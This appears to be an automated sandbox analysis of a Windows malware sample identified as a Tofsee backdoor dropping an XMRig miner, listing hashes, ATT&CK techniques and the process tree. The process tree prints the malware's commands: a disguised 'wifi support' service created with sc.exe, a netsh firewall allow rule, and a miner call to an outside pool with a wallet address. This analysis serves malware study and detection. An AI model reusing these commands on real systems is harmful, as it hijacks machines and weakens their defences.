Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    26-09-2021 17:46

General

  • Target

    ac640c150beb86b7a5dea208cdf187aadba828f7115ed2418ab06461a0ccfcc0.exe

  • Size

    153KB

  • MD5

    b4b463d7f677821bef88956f82e4acfe

  • SHA1

    e8b8e46d97fddabb2a1e3641b934ea82f7f84617

  • SHA256

    ac640c150beb86b7a5dea208cdf187aadba828f7115ed2418ab06461a0ccfcc0

  • SHA512

    ce0a47ddd139ddc927776b9925c194aa8ed22d91409d068674e2ebdb16956155e1d3169e46db97841047084ca552af89f6452244064f0e0883c86a73b58c8d73

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ac640c150beb86b7a5dea208cdf187aadba828f7115ed2418ab06461a0ccfcc0.exe
    "C:\Users\Admin\AppData\Local\Temp\ac640c150beb86b7a5dea208cdf187aadba828f7115ed2418ab06461a0ccfcc0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2392
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\owyfekwd\
      2⤵
        PID:2676
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qtmusucm.exe" C:\Windows\SysWOW64\owyfekwd\
        2⤵
          PID:2112
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create owyfekwd binPath= "C:\Windows\SysWOW64\owyfekwd\qtmusucm.exe /d\"C:\Users\Admin\AppData\Local\Temp\ac640c150beb86b7a5dea208cdf187aadba828f7115ed2418ab06461a0ccfcc0.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:2628
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description owyfekwd "wifi internet conection"
            2⤵
              PID:3332
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start owyfekwd
              2⤵
                PID:808
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1980
              • C:\Windows\SysWOW64\owyfekwd\qtmusucm.exe
                C:\Windows\SysWOW64\owyfekwd\qtmusucm.exe /d"C:\Users\Admin\AppData\Local\Temp\ac640c150beb86b7a5dea208cdf187aadba828f7115ed2418ab06461a0ccfcc0.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1272
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:1508
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2168

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              New Service

              1
              T1050

              Modify Existing Service

              1
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              New Service

              1
              T1050

              Defense Evasion

              Disabling Security Tools

              1
              T1089

              Modify Registry

              2
              T1112

              Discovery

              System Information Discovery

              1
              T1082

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\qtmusucm.exe
                MD5

                e35fb3fa3d67ba10ccde60d9247a56c3

                SHA1

                94fbd53fcace8897511d38e61903c83e1656335d

                SHA256

                24a68de6e060fda2b0d8a07fc07140bf8b671597c88e2f4150247f72e782432e

                SHA512

                b4985debf41c7cc6382acbd57d824929078a800cf7a27cbbdceb95ed99d8a16f047fc97762566d3000222e7940689f56970e545e7017ba5261659bcd15927e32

              • C:\Windows\SysWOW64\owyfekwd\qtmusucm.exe
                MD5

                e35fb3fa3d67ba10ccde60d9247a56c3

                SHA1

                94fbd53fcace8897511d38e61903c83e1656335d

                SHA256

                24a68de6e060fda2b0d8a07fc07140bf8b671597c88e2f4150247f72e782432e

                SHA512

                b4985debf41c7cc6382acbd57d824929078a800cf7a27cbbdceb95ed99d8a16f047fc97762566d3000222e7940689f56970e545e7017ba5261659bcd15927e32

              • memory/808-122-0x0000000000000000-mapping.dmp
              • memory/1272-129-0x0000000000D50000-0x0000000000D63000-memory.dmp
                Filesize

                76KB

              • memory/1272-130-0x0000000000400000-0x00000000004AD000-memory.dmp
                Filesize

                692KB

              • memory/1508-126-0x0000000002629A6B-mapping.dmp
              • memory/1508-125-0x0000000002620000-0x0000000002635000-memory.dmp
                Filesize

                84KB

              • memory/1508-131-0x0000000002620000-0x0000000002635000-memory.dmp
                Filesize

                84KB

              • memory/1980-124-0x0000000000000000-mapping.dmp
              • memory/2112-117-0x0000000000000000-mapping.dmp
              • memory/2168-137-0x0000000002B5259C-mapping.dmp
              • memory/2168-133-0x0000000002AC0000-0x0000000002BB1000-memory.dmp
                Filesize

                964KB

              • memory/2168-138-0x0000000002AC0000-0x0000000002BB1000-memory.dmp
                Filesize

                964KB

              • memory/2392-118-0x0000000000400000-0x00000000004AD000-memory.dmp
                Filesize

                692KB

              • memory/2392-115-0x0000000000500000-0x000000000064A000-memory.dmp
                Filesize

                1.3MB

              • memory/2628-120-0x0000000000000000-mapping.dmp
              • memory/2676-116-0x0000000000000000-mapping.dmp
              • memory/3332-121-0x0000000000000000-mapping.dmp